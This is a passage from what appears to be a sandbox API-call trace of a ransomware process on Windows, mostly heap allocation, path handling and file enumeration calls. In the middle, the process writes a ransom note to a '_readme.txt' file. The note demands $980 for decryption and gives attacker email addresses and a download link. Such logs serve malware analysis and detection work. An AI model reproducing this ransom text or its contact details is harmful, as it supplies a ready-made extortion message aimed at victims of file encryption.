lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.319] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0180.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.319] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.319] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.319] PathFindFileNameW (pszPath="") returned="" [0180.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.320] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.320] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.320] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.320] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.320] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0180.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.321] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0180.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.321] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.321] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.321] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.323] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*" (normalized: "c:\\boot\\pl-pl\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.325] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.325] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.325] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.325] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.326] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.341] HeapFree (in: hHeap=0x2c0000, 